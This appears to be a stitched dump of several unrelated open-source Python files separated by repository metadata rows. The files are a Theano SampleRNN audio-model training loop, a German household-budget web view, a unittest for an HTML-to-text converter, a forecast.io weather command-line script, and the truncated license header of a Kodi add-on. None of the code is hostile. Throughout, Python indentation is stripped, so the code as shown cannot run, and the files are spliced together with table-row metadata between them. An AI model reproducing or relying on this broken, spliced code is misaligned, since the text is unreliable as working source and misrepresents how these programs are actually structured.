# Handling SKIP_CONN
if RNN_TYPE == 'GRU':
rnns_out, last_hidden = lib.ops.stackedGRU('FrameLevel.GRU',
N_RNN,
DIM,
DIM,
gru_input,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
elif RNN_TYPE == 'LSTM':
rnns_out, last_hidden = lib.ops.stackedLSTM('FrameLevel.LSTM',
N_RNN,
DIM,
DIM,
gru_input,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
output = lib.ops.Linear(
'FrameLevel.Output',
DIM,
FRAME_SIZE * DIM,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
output = output.reshape((output.shape[0], output.shape[1] * FRAME_SIZE, DIM))
return (output, last_hidden)
def sample_level_predictor(frame_level_outputs, prev_samples):
"""
frame_level_outputs.shape: (batch size, DIM)
prev_samples.shape: (batch size, FRAME_SIZE)
output.shape: (batch size, Q_LEVELS)
"""
# Handling EMB_SIZE
if EMB_SIZE == 0: # no support for one-hot in three_tier and one_tier.
prev_samples = lib.ops.T_one_hot(prev_samples, Q_LEVELS)
# (BATCH_SIZE*N_FRAMES*FRAME_SIZE, FRAME_SIZE, Q_LEVELS)
last_out_shape = Q_LEVELS
elif EMB_SIZE > 0:
prev_samples = lib.ops.Embedding(
'SampleLevel.Embedding',
Q_LEVELS,
EMB_SIZE,
prev_samples)
# (BATCH_SIZE*N_FRAMES*FRAME_SIZE, FRAME_SIZE, EMB_SIZE), f32
last_out_shape = EMB_SIZE
else:
raise ValueError('EMB_SIZE cannot be negative.')
prev_samples = prev_samples.reshape((-1, FRAME_SIZE * last_out_shape))
out = lib.ops.Linear(
'SampleLevel.L1_PrevSamples',
FRAME_SIZE * last_out_shape,
DIM,
prev_samples,
biases=False,
initialization='he',
weightnorm=WEIGHT_NORM
)
out += frame_level_outputs
# out = T.nnet.relu(out) # commented out to be similar to two_tier
out = lib.ops.Linear('SampleLevel.L2',
DIM,
DIM,
out,
initialization='he',
weightnorm=WEIGHT_NORM)
out = T.nnet.relu(out)
# L3
out = lib.ops.Linear('SampleLevel.L3',
DIM,
DIM,
out,
initialization='he',
weightnorm=WEIGHT_NORM)
out = T.nnet.relu(out)
# Output
# We apply the softmax later
out = lib.ops.Linear('SampleLevel.Output',
DIM,
Q_LEVELS,
out,
weightnorm=WEIGHT_NORM)
return out
sequences = T.imatrix('sequences')
h0 = T.tensor3('h0')
big_h0 = T.tensor3('big_h0')
reset = T.iscalar('reset')
mask = T.matrix('mask')
if args.debug:
# Solely for debugging purposes.
# Maybe I should set the compute_test_value=warn from here.
sequences.tag.test_value = numpy.zeros((BATCH_SIZE, SEQ_LEN+OVERLAP), dtype='int32')
h0.tag.test_value = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
big_h0.tag.test_value = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
reset.tag.test_value = numpy.array(1, dtype='int32')
mask.tag.test_value = numpy.ones((BATCH_SIZE, SEQ_LEN+OVERLAP), dtype='float32')
big_input_sequences = sequences[:, :-BIG_FRAME_SIZE]
input_sequences = sequences[:, BIG_FRAME_SIZE-FRAME_SIZE:-FRAME_SIZE]
target_sequences = sequences[:, BIG_FRAME_SIZE:]
target_mask = mask[:, BIG_FRAME_SIZE:]
big_frame_level_outputs, new_big_h0, big_frame_independent_preds = big_frame_level_rnn(big_input_sequences, big_h0, reset)
frame_level_outputs, new_h0 = frame_level_rnn(input_sequences, big_frame_level_outputs, h0, reset)
prev_samples = sequences[:, BIG_FRAME_SIZE-FRAME_SIZE:-1]
prev_samples = prev_samples.reshape((1, BATCH_SIZE, 1, -1))
prev_samples = T.nnet.neighbours.images2neibs(prev_samples, (1, FRAME_SIZE), neib_step=(1, 1), mode='valid')
prev_samples = prev_samples.reshape((BATCH_SIZE * SEQ_LEN, FRAME_SIZE))
sample_level_outputs = sample_level_predictor(
frame_level_outputs.reshape((BATCH_SIZE * SEQ_LEN, DIM)),
prev_samples
)
cost = T.nnet.categorical_crossentropy(
T.nnet.softmax(sample_level_outputs),
target_sequences.flatten()
)
cost = cost.reshape(target_sequences.shape)
cost = cost * target_mask
# Don't use these lines; could end up with NaN
# Specially at the end of audio files where mask is
# all zero for some of the shorter files in mini-batch.
#cost = cost.sum(axis=1) / target_mask.sum(axis=1)
#cost = cost.mean(axis=0)
# Use this one instead.
cost = cost.sum()
cost = cost / target_mask.sum()
# By default we report cross-entropy cost in bits.
# Switch to nats by commenting out this line:
# log_2(e) = 1.44269504089
cost = cost * lib.floatX(numpy.log2(numpy.e))
ip_cost = lib.floatX(numpy.log2(numpy.e)) * T.nnet.categorical_crossentropy(
T.nnet.softmax(big_frame_independent_preds.reshape((-1, Q_LEVELS))),
target_sequences.flatten()
)
ip_cost = ip_cost.reshape(target_sequences.shape)
ip_cost = ip_cost * target_mask
ip_cost = ip_cost.sum()
ip_cost = ip_cost / target_mask.sum()
### Getting the params, grads, updates, and Theano functions ###
#params = lib.get_params(cost, lambda x: hasattr(x, 'param') and x.param==True)
#ip_params = lib.get_params(ip_cost, lambda x: hasattr(x, 'param') and x.param==True\
# and 'BigFrameLevel' in x.name)
#other_params = [p for p in params if p not in ip_params]
#params = ip_params + other_params
#lib.print_params_info(params, path=FOLDER_PREFIX)
#
#grads = T.grad(cost, wrt=params, disconnected_inputs='warn')
#grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in grads]
#
#updates = lasagne.updates.adam(grads, params, learning_rate=LEARNING_RATE)
###########
all_params = lib.get_params(cost, lambda x: hasattr(x, 'param') and x.param==True)
ip_params = lib.get_params(ip_cost, lambda x: hasattr(x, 'param') and x.param==True\
and 'BigFrameLevel' in x.name)
other_params = [p for p in all_params if p not in ip_params]
all_params = ip_params + other_params
lib.print_params_info(ip_params, path=FOLDER_PREFIX)
lib.print_params_info(other_params, path=FOLDER_PREFIX)
lib.print_params_info(all_params, path=FOLDER_PREFIX)
ip_grads = T.grad(ip_cost, wrt=ip_params, disconnected_inputs='warn')
ip_grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in ip_grads]
other_grads = T.grad(cost, wrt=other_params, disconnected_inputs='warn')
other_grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in other_grads]
grads = T.grad(cost, wrt=all_params, disconnected_inputs='warn')
grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in grads]
ip_updates = lasagne.updates.adam(ip_grads, ip_params)
other_updates = lasagne.updates.adam(other_grads, other_params)
updates = lasagne.updates.adam(grads, all_params)
# Training function(s)
ip_train_fn = theano.function(
[sequences, big_h0, reset, mask],
[ip_cost, new_big_h0],
updates=ip_updates,
on_unused_input='warn'
)
other_train_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
updates=other_updates,
on_unused_input='warn'
)
train_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
updates=updates,
on_unused_input='warn'
)
# Validation and Test function, hence no updates
ip_test_fn = theano.function(
[sequences, big_h0, reset, mask],
[ip_cost, new_big_h0],
on_unused_input='warn'
)
other_test_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
on_unused_input='warn'
)
test_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
on_unused_input='warn'
)
# Sampling at big frame level
big_frame_level_generate_fn = theano.function(
[sequences, big_h0, reset],
big_frame_level_rnn(sequences, big_h0, reset)[0:2],
on_unused_input='warn'
)
# Sampling at frame level
big_frame_level_outputs = T.matrix('big_frame_level_outputs')
frame_level_generate_fn = theano.function(
[sequences, big_frame_level_outputs, h0, reset],
frame_level_rnn(sequences, big_frame_level_outputs.dimshuffle(0,'x',1), h0, reset),
on_unused_input='warn'
)
# Sampling at audio sample level
frame_level_outputs = T.matrix('frame_level_outputs')
prev_samples = T.imatrix('prev_samples')
sample_level_generate_fn = theano.function(
[frame_level_outputs, prev_samples],
lib.ops.softmax_and_sample(
sample_level_predictor(
frame_level_outputs,
prev_samples
)
),
on_unused_input='warn'
)
# Uniform [-0.5, 0.5) for half of initial state for generated samples
# to study the behaviour of the model and also to introduce some diversity
# to samples in a simple way. [it's disabled]
fixed_rand_h0 = numpy.random.rand(N_SEQS//2, N_RNN, H0_MULT*DIM)
fixed_rand_h0 -= 0.5
fixed_rand_h0 = fixed_rand_h0.astype('float32')
fixed_rand_big_h0 = numpy.random.rand(N_SEQS//2, N_RNN, H0_MULT*DIM)
fixed_rand_big_h0 -= 0.5
fixed_rand_big_h0 = fixed_rand_big_h0.astype('float32')
def generate_and_save_samples(tag):
def write_audio_file(name, data):
data = data.astype('float32')
data -= data.min()
data /= data.max()
data -= 0.5
data *= 0.95
scipy.io.wavfile.write(
os.path.join(SAMPLES_PATH, name+'.wav'),
BITRATE,
data)
total_time = time()
# Generate N_SEQS' sample files, each 5 seconds long
N_SECS = 5
LENGTH = N_SECS*BITRATE if not args.debug else 100
samples = numpy.zeros((N_SEQS, LENGTH), dtype='int32')
samples[:, :BIG_FRAME_SIZE] = Q_ZERO
# First half zero, others fixed random at each checkpoint
big_h0 = numpy.zeros(
(N_SEQS-fixed_rand_big_h0.shape[0], N_BIG_RNN, H0_MULT*BIG_DIM),
dtype='float32'
)
big_h0 = numpy.concatenate((big_h0, fixed_rand_big_h0), axis=0)
h0 = numpy.zeros(
(N_SEQS-fixed_rand_h0.shape[0], N_RNN, H0_MULT*DIM),
dtype='float32'
)
h0 = numpy.concatenate((h0, fixed_rand_h0), axis=0)
big_frame_level_outputs = None
frame_level_outputs = None
for t in xrange(BIG_FRAME_SIZE, LENGTH):
if t % BIG_FRAME_SIZE == 0:
big_frame_level_outputs, big_h0 = big_frame_level_generate_fn(
samples[:, t-BIG_FRAME_SIZE:t],
big_h0,
numpy.int32(t == BIG_FRAME_SIZE)
)
if t % FRAME_SIZE == 0:
frame_level_outputs, h0 = frame_level_generate_fn(
samples[:, t-FRAME_SIZE:t],
big_frame_level_outputs[:, (t / FRAME_SIZE) % (BIG_FRAME_SIZE / FRAME_SIZE)],
h0,
numpy.int32(t == BIG_FRAME_SIZE)
)
samples[:, t] = sample_level_generate_fn(
frame_level_outputs[:, t % FRAME_SIZE],
samples[:, t-FRAME_SIZE:t]
)
total_time = time() - total_time
log = "{} samples of {} seconds length generated in {} seconds."
log = log.format(N_SEQS, N_SECS, total_time)
print log,
for i in xrange(N_SEQS):
samp = samples[i]
if Q_TYPE == 'mu-law':
from datasets.dataset import mu2linear
samp = mu2linear(samp)
elif Q_TYPE == 'a-law':
raise NotImplementedError('a-law is not implemented')
write_audio_file("sample_{}_{}".format(tag, i), samp)
def monitor(data_feeder):
"""
Cost and time of test_fn on a given dataset section.
Pass only one of `valid_feeder` or `test_feeder`.
Don't pass `train_feed`.
:returns:
Mean cost over the input dataset (data_feeder)
Total time spent
"""
_total_time = time()
_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
_big_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
_costs = []
_data_feeder = load_data(data_feeder)
for _seqs, _reset, _mask in _data_feeder:
_cost, _big_h0, _h0 = test_fn(_seqs, _big_h0, _h0, _reset, _mask)
_costs.append(_cost)
return numpy.mean(_costs), time() - _total_time
print "Wall clock time spent before training started: {:.2f}h"\
.format((time()-exp_start)/3600.)
print "Training!"
total_iters = 0
total_time = 0.
last_print_time = 0.
last_print_iters = 0
costs = []
lowest_valid_cost = numpy.finfo(numpy.float32).max
corresponding_test_cost = numpy.finfo(numpy.float32).max
new_lowest_cost = False
end_of_batch = False
epoch = 0
h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
big_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
# Initial load train dataset
tr_feeder = load_data(train_feeder)
### Handling the resume option:
if RESUME:
# Check if checkpoint from previous run is not corrupted.
# Then overwrite some of the variables above.
iters_to_consume, res_path, epoch, total_iters,\
[lowest_valid_cost, corresponding_test_cost, test_cost] = \
lib.resumable(path=FOLDER_PREFIX,
iter_key=iter_str,
epoch_key=epoch_str,
add_resume_counter=True,
other_keys=[lowest_valid_str,
corresp_test_str,
test_nll_str])
# At this point we saved the pkl file.
last_print_iters = total_iters
print "### RESUMING JOB FROM EPOCH {}, ITER {}".format(epoch, total_iters)
# Consumes this much iters to get to the last point in training data.
consume_time = time()
for i in xrange(iters_to_consume):
tr_feeder.next()
consume_time = time() - consume_time
print "Train data ready in {:.2f}secs after consuming {} minibatches.".\
format(consume_time, iters_to_consume)
lib.load_params(res_path)
print "Parameters from last available checkpoint loaded."
while True:
# THIS IS ONE ITERATION
if total_iters % 500 == 0:
print total_iters,
total_iters += 1
try:
# Take as many mini-batches as possible from train set
mini_batch = tr_feeder.next()
except StopIteration:
# Mini-batches are finished. Load it again.
# Basically, one epoch.
tr_feeder = load_data(train_feeder)
# and start taking new mini-batches again.
mini_batch = tr_feeder.next()
epoch += 1
end_of_batch = True
print "[Another epoch]",
seqs, reset, mask = mini_batch
start_time = time()
cost, big_h0, h0 = train_fn(seqs, big_h0, h0, reset, mask)
total_time += time() - start_time
#print "This cost:", cost, "This h0.mean()", h0.mean()
costs.append(cost)
# Monitoring step
if (TRAIN_MODE=='iters' and total_iters-last_print_iters == PRINT_ITERS) or \
(TRAIN_MODE=='time' and total_time-last_print_time >= PRINT_TIME) or \
(TRAIN_MODE=='time-iters' and total_time-last_print_time >= PRINT_TIME) or \
(TRAIN_MODE=='iters-time' and total_iters-last_print_iters >= PRINT_ITERS) or \
end_of_batch:
# 0. Validation
print "\nValidation!",
valid_cost, valid_time = monitor(valid_feeder)
print "Done!"
# 1. Test
test_time = 0.
# Only when the validation cost is improved get the cost for test set.
if valid_cost < lowest_valid_cost:
lowest_valid_cost = valid_cost
print "\n>>> Best validation cost of {} reached. Testing!"\
.format(valid_cost),
test_cost, test_time = monitor(test_feeder)
print "Done!"
# Report last one which is the lowest on validation set:
print ">>> test cost:{}\ttotal time:{}".format(test_cost, test_time)
corresponding_test_cost = test_cost
new_lowest_cost = True
# 2. Stdout the training progress
print_info = "epoch:{}\ttotal iters:{}\twall clock time:{:.2f}h\n"
print_info += ">>> Lowest valid cost:{}\t Corresponding test cost:{}\n"
print_info += "\ttrain cost:{:.4f}\ttotal time:{:.2f}h\tper iter:{:.3f}s\n"
print_info += "\tvalid cost:{:.4f}\ttotal time:{:.2f}h\n"
print_info += "\ttest cost:{:.4f}\ttotal time:{:.2f}h"
print_info = print_info.format(epoch,
total_iters,
(time()-exp_start)/3600,
lowest_valid_cost,
corresponding_test_cost,
numpy.mean(costs),
total_time/3600,
total_time/total_iters,
valid_cost,
valid_time/3600,
test_cost,
test_time/3600)
print print_info
tag = "e{}_i{}_t{:.2f}_tr{:.4f}_v{:.4f}"
tag = tag.format(epoch,
total_iters,
total_time/3600,
numpy.mean(cost),
valid_cost)
tag += ("_best" if new_lowest_cost else "")
# 3. Save params of model (IO bound, time consuming)
# If saving params is not successful, there shouldn't be any trace of
# successful monitoring step in train_log as well.
print "Saving params!",
lib.save_params(
os.path.join(PARAMS_PATH, 'params_{}.pkl'.format(tag))
)
print "Done!"
# 4. Save and graph training progress (fast)
training_info = {epoch_str : epoch,
iter_str : total_iters,
train_nll_str : numpy.mean(costs),
valid_nll_str : valid_cost,
test_nll_str : test_cost,
lowest_valid_str : lowest_valid_cost,
corresp_test_str : corresponding_test_cost,
'train time' : total_time,
'valid time' : valid_time,
'test time' : test_time,
'wall clock time' : time()-exp_start}
lib.save_training_info(training_info, FOLDER_PREFIX)
print "Train info saved!",
y_axis_strs = [train_nll_str, valid_nll_str, test_nll_str]
lib.plot_traing_info(iter_str, y_axis_strs, FOLDER_PREFIX)
print "And plotted!"
# 5. Generate and save samples (time consuming)
# If not successful, we still have the params to sample afterward
print "Sampling!",
# Generate samples
generate_and_save_samples(tag)
print "Done!"
if total_iters-last_print_iters == PRINT_ITERS \
or total_time-last_print_time >= PRINT_TIME:
# If we are here b/c of onom_end_of_batch, we shouldn't mess
# with costs and last_print_iters
costs = []
last_print_time += PRINT_TIME
last_print_iters += PRINT_ITERS
end_of_batch = False
new_lowest_cost = False
print "Validation Done!\nBack to Training..."
if (TRAIN_MODE=='iters' and total_iters == STOP_ITERS) or \
(TRAIN_MODE=='time' and total_time >= STOP_TIME) or \
((TRAIN_MODE=='time-iters' or TRAIN_MODE=='iters-time') and \
(total_iters == STOP_ITERS or total_time >= STOP_TIME)):
print "Done! Total iters:", total_iters, "Total time: ", total_time
print "Experiment ended at:", datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M')
print "Wall clock time spent: {:.2f}h"\
.format((time()-exp_start)/3600)
sys.exit()
| mit | -2,786,688,481,508,566,500 | 37.406452 | 148 | 0.59379 | false |
RosesTheN00b/BudgetButlerWeb | butler_offline/views/einzelbuchungen/uebersicht_monat.py | 1 | 8451 | from butler_offline.viewcore.state import persisted_state
from butler_offline.core import time
from butler_offline.viewcore import request_handler
from butler_offline.viewcore import viewcore
from butler_offline.core.report import ReportGenerator
from butler_offline.viewcore.converter import datum_to_string
def _handle_request(request):
context = viewcore.generate_base_context('monatsuebersicht')
einzelbuchungen = persisted_state.database_instance().einzelbuchungen
monate = sorted(einzelbuchungen.get_monate(), reverse=True)
context['monate'] = monate
if not monate:
return viewcore.generate_error_context('monatsuebersicht', 'Keine Ausgaben erfasst')
selected_item = context['monate'][0]
if request.method == "POST":
selected_item = request.values['date']
month = int(float(selected_item.split("_")[1]))
year = int(float(selected_item.split("_")[0]))
table_data_selection = einzelbuchungen.select().select_month(month).select_year(year)
table_ausgaben = table_data_selection.select_ausgaben()
table_einnahmen = table_data_selection.select_einnahmen()
'''
Berechnung der Ausgaben für das Kreisdiagramm
'''
ausgaben_liste = []
ausgaben_labels = []
ausgaben_data = []
ausgaben_colors = []
for kategorie, row in table_ausgaben.group_by_kategorie().iterrows():
ausgaben_labels.append(kategorie)
ausgaben_data.append("%.2f" % abs(row.Wert))
ausgaben_colors.append("#" + einzelbuchungen.get_farbe_fuer(kategorie))
ausgaben_liste.append((kategorie, "%.2f" % row.Wert, einzelbuchungen.get_farbe_fuer(kategorie)))
context['ausgaben'] = ausgaben_liste
context['ausgaben_labels'] = ausgaben_labels
context['ausgaben_data'] = ausgaben_data
context['ausgaben_colors'] = ausgaben_colors
'''
Berechnung der Einnahmen für das Kreisdiagramm
'''
einnahmen_liste = []
einnahmen_labels = []
einnahmen_data = []
einnahmen_colors = []
for kategorie, row in table_einnahmen.group_by_kategorie().iterrows():
einnahmen_labels.append(kategorie)
einnahmen_data.append("%.2f" % abs(row.Wert))
einnahmen_colors.append("#" + einzelbuchungen.get_farbe_fuer(kategorie))
einnahmen_liste.append((kategorie, "%.2f" % row.Wert, einzelbuchungen.get_farbe_fuer(kategorie)))
context['einnahmen'] = einnahmen_liste
context['einnahmen_labels'] = einnahmen_labels
context['einnahmen_data'] = einnahmen_data
context['einnahmen_colors'] = einnahmen_colors
zusammenfassung = table_data_selection.get_month_summary()
for tag, kategorien_liste in zusammenfassung:
for einheit in kategorien_liste:
einheit['farbe'] = einzelbuchungen.get_farbe_fuer(einheit['kategorie'])
context['zusammenfassung'] = zusammenfassung
ausgaben_monat = table_ausgaben.sum()
context['gesamt'] = "%.2f" % ausgaben_monat
einnahmen_monat = table_einnahmen.sum()
context['gesamt_einnahmen'] = "%.2f" % einnahmen_monat
selected_date = str(year) + "_" + str(month).rjust(2, "0")
context['selected_date'] = selected_date
context['selected_year'] = year
if einnahmen_monat >= abs(ausgaben_monat):
context['color_uebersicht_gruppe_1'] = "gray"
context['name_uebersicht_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_gruppe_1'] = '%.2f' % abs(ausgaben_monat)
context['color_uebersicht_gruppe_2'] = "lightgreen"
context['name_uebersicht_gruppe_2'] = 'Einnahmenüberschuss'
context['wert_uebersicht_gruppe_2'] = '%.2f' % (einnahmen_monat + ausgaben_monat)
else:
context['color_uebersicht_gruppe_1'] = "gray"
context['name_uebersicht_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_gruppe_1'] = '%.2f' % einnahmen_monat
context['color_uebersicht_gruppe_2'] = "red"
context['name_uebersicht_gruppe_2'] = 'Ungedeckte Ausgaben'
context['wert_uebersicht_gruppe_2'] = '%.2f' % ((ausgaben_monat + einnahmen_monat) * -1)
einnahmen_jahr = einzelbuchungen.select().select_einnahmen().select_year(year).sum()
ausgaben_jahr = einzelbuchungen.select().select_ausgaben().select_year(year).sum()
if einnahmen_jahr >= abs(ausgaben_jahr):
context['color_uebersicht_jahr_gruppe_1'] = "gray"
context['name_uebersicht_jahr_gruppe_1'] = 'Gedeckte Einnahmen'
context['wert_uebersicht_jahr_gruppe_1'] = '%.2f' % abs(ausgaben_jahr)
context['color_uebersicht_jahr_gruppe_2'] = "lightgreen"
context['name_uebersicht_jahr_gruppe_2'] = 'Einnahmenüberschuss'
context['wert_uebersicht_jahr_gruppe_2'] = '%.2f' % (einnahmen_jahr + ausgaben_jahr)
else:
context['color_uebersicht_jahr_gruppe_1'] = "gray"
context['name_uebersicht_jahr_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_1'] = '%.2f' % einnahmen_jahr
context['color_uebersicht_jahr_gruppe_2'] = "red"
context['name_uebersicht_jahr_gruppe_2'] = 'Ungedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_2'] = '%.2f' % ((ausgaben_jahr + einnahmen_jahr) * -1)
return context
def index(request):
return request_handler.handle_request(request, _handle_request, 'einzelbuchungen/uebersicht_monat.html')
def _abrechnen(request):
context = viewcore.generate_base_context('monatsuebersicht')
date = time.today()
year = date.year
month = date.month
quantity = 60
if request.method == 'POST':
if 'date' in request.values:
str_year, str_month = request.values['date'].split('_')
year = int(str_year)
month = int(str_month)
if 'quantity' in request.values:
quantity = int(request.values['quantity'])
einzelbuchungen = persisted_state.database_instance().einzelbuchungen
generator = ReportGenerator('Monatsübersicht für ' + str(month) + '/' + str(year), quantity)
table_data_selection = einzelbuchungen.select().select_month(month).select_year(year)
table_ausgaben = table_data_selection.select_ausgaben()
table_einnahmen = table_data_selection.select_einnahmen()
if _is_selected(request, 'zusammenfassung_einnahmen'):
data = {}
for kategorie, row in table_einnahmen.group_by_kategorie().iterrows():
data[kategorie] = row.Wert
generator.add_half_line_elements({'Einnahmen': data})
if _is_selected(request, 'zusammenfassung_ausgaben'):
data = {}
for kategorie, row in table_ausgaben.group_by_kategorie().iterrows():
data[kategorie] = row.Wert
generator.add_half_line_elements({'Ausgaben': data})
if _is_selected(request, 'einnahmen'):
generator.add_halfline('')
generator.add_halfline('')
generator.add_halfline('----Einnahmen----')
zusammenfassung = table_einnahmen.zusammenfassung()
compiled_zusammenfassung = {}
for tag, kategorien_liste in zusammenfassung:
compiled_zusammenfassung[datum_to_string(tag)] = {}
for einheit in kategorien_liste:
compiled_zusammenfassung[datum_to_string(tag)][einheit['name']] = float(einheit['summe'])
generator.add_half_line_elements(compiled_zusammenfassung)
if _is_selected(request, 'ausgaben'):
generator.add_halfline('')
generator.add_halfline('')
generator.add_halfline('----Ausgaben----')
zusammenfassung = table_ausgaben.zusammenfassung()
compiled_zusammenfassung = {}
for tag, kategorien_liste in zusammenfassung:
compiled_zusammenfassung[datum_to_string(tag)] = {}
for einheit in kategorien_liste:
compiled_zusammenfassung[datum_to_string(tag)][einheit['name']] = float(einheit['summe'])
generator.add_half_line_elements(compiled_zusammenfassung)
page = ''
for line in generator.generate_pages():
page = page + '<br>' + line
context['abrechnungstext'] = '<pre>' + page + '</pre>'
context['element_titel'] = 'Abrechnung vom {month}/{year}'.format(month=month, year=year)
return context
def _is_selected(request, name):
if request.method != 'POST':
return True
if name in request.values:
return True
return False
def abrechnen(request):
return request_handler.handle_request(request, _abrechnen, 'shared/present_abrechnung.html')
| agpl-3.0 | -3,474,251,232,784,731,600 | 41.437186 | 108 | 0.665483 | false |
Aplopio/document-converter | converters/tests/test_html_txt.py | 1 | 1301 | import sys
sys.path.append('..')
sys.path.append('../..')
import unittest
from html_txt import HtmlTxt
from file_manager import FileManager
class HtmlTxtTests(unittest.TestCase):
def test2_htmltxt1(self):
file1 = FileManager('test_files/test1.html')
file2 = FileManager('test_files/test2.html')
file3 = FileManager('test_files/test3.html')
file4 = FileManager('test_files/test4.html')
test = HtmlTxt([file1, file2, file3, file4])
test.convert()
self.failUnless(open('test_files/test1.txt'))
self.failUnless(open('test_files/test2.txt'))
self.failUnless(open('test_files/test3.txt'))
self.failUnless(open('test_files/test4.txt'))
def test2_htmltxt2(self):
file1 = FileManager('test_files/test1.html', '.')
file2 = FileManager('test_files/test2.html', '.')
file3 = FileManager('test_files/test3.html', '.')
file4 = FileManager('test_files/test4.html', '.')
test = HtmlTxt([file1, file2, file3, file4])
test.convert()
self.failUnless(open('test1.txt'))
self.failUnless(open('test2.txt'))
self.failUnless(open('test3.txt'))
self.failUnless(open('test4.txt'))
def main():
unittest.main()
if __name__ == '__main__':
main()
| mit | -8,331,685,878,504,589,000 | 30.731707 | 57 | 0.623367 | false |
schmodd/forecast.py | forecast.py | 1 | 4251 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# todo: add alerts, colors
import requests
import json
import datetime
import argparse
import sys
from prettytable import PrettyTable
# surf to https://developer.forecast.io/ for an api key
# use http://dbsgeo.com/latlon/ to get coordinates for your location
API_KEY=''
LAT=''
LONG=''
LIMIT=24 # limit hourly forecast output (48 max)
#some api settings
UNITS='si' # auto possibly shows wrong measuring unit
LANG='en'
def formatDatetime(unixTime, outputFormat='%d. %b. %H:%M'):
return datetime.datetime.fromtimestamp(unixTime).strftime(outputFormat)
def getMeasuringUnit():
return '\N{DEGREE SIGN}F' if UNITS == 'us' else '\N{DEGREE SIGN}C'
def getPrecip(probability, type):
probability = '{:3.0f} {:1}'.format(probability * 100, '%')
return '{:} {:>5}'.format(probability, '-') if type == 0 else '{:} {:>5}'.format(probability, type)
def showDaily(measuring_unit):
HEAD = ['Date', 'Temp min', 'Temp max', 'HUM', 'SR', 'SS', 'Precip', 'Summary']
table = PrettyTable(HEAD, border = False, padding_width = 2)
table.align='r'
table.align['Date'] = 'l'
table.align['Summary'] = 'l'
for day in result['daily']['data']:
table.add_row([formatDatetime(day['time'], '%d. %b.'), '{:4.2f} {:2}'.format(day['temperatureMin'],
measuring_unit), '{:4.2f} {:2}'.format(day['temperatureMax'], measuring_unit),
'{:3.0f} {:1}'.format(day['humidity'] * 100, '%'), formatDatetime(day['sunriseTime'], '%H:%M'),
formatDatetime(day['sunsetTime'], '%H:%M'), getPrecip(day['precipProbability'],
day['precipType'] if day['precipProbability'] > 0 else 0), day['summary']])
print('\n', end='')
print(table)
def showHourly(measuring_unit):
HEAD = ['Date', 'Temp', 'HUM', 'Precip', 'Summary']
table = PrettyTable(HEAD, border = False, padding_width = 2)
table.align='r'
table.align['Date'] = 'l'
table.align['Summary'] = 'l'
for hour in result['hourly']['data'][0:LIMIT]:
table.add_row([formatDatetime(hour['time'], '%d. %b. %H:%M'), '{:4.2f} {:2}'.format(hour['temperature'],
measuring_unit), '{:3.0f} {:1}'.format(hour['humidity'] * 100, '%'), getPrecip(hour['precipProbability'],
hour['precipType'] if hour['precipProbability'] > 0 else 0), hour['summary']])
print('\n', end='')
print(table)
if __name__ == '__main__':
if not API_KEY or not LAT or not LONG:
sys.exit("aborted! please make sure api-key and coordinates are specified")
parser = argparse.ArgumentParser(description='weather forecast powered by forecast.io')
group = parser.add_mutually_exclusive_group()
group.add_argument('-df', help='daily forecast', action='store_true')
group.add_argument('-hf', help='hourly forecast', action='store_true')
args = parser.parse_args()
BASE_URL = 'https://api.forecast.io/forecast/'
SETTINGS = API_KEY + '/' + LAT + ',' + LONG + '?units=' + UNITS + '&lang='+ LANG + '&exclude=flags,minutely,'
URL = BASE_URL + SETTINGS
HTTP_HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0',
'Accept-Encoding': 'gzip'}
MEAS_UNIT = getMeasuringUnit()
if args.df:
URL += 'hourly,currently'
elif args.hf:
URL += 'daily,currently'
else:
URL += 'hourly,daily'
result = requests.get(URL, headers=HTTP_HEADERS)
if result.status_code == 200:
result = result.json()
if args.df:
showDaily(MEAS_UNIT)
elif args.hf:
showHourly(MEAS_UNIT)
else:
print('{:} {:10}'.format('\n date:', formatDatetime(result['currently']['time'])), end='')
print('{:} {:6.2f} {:2}'.format(' | temp:', result['currently']['temperature'], MEAS_UNIT), end='')
print('{:} {:2.0f} {:1}'.format(' | humidity:', result['currently']['humidity'] * 100, '%'), end='')
print('{:} {:}'.format(' | precipitation:', getPrecip(result['currently']['precipProbability'],
result['currently']['precipType'] if result['currently']['precipProbability'] > 0 else 0)))
else:
print('aborted! problems connecting to forecast.io')
| mit | -898,684,992,294,098,300 | 40.676471 | 117 | 0.605034 | false |
repotvsupertuga/tvsupertuga.repository | script.module.python.koding.aio/lib/koding/tutorials.py | 1 | 7420 | # -*- coding: utf-8 -*-
# script.module.python.koding.aio
# Python Koding AIO (c) by TOTALREVOLUTION LTD ([email protected])
# Python Koding AIO is licensed under a
# Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.
# You should have received a copy of the license along with this
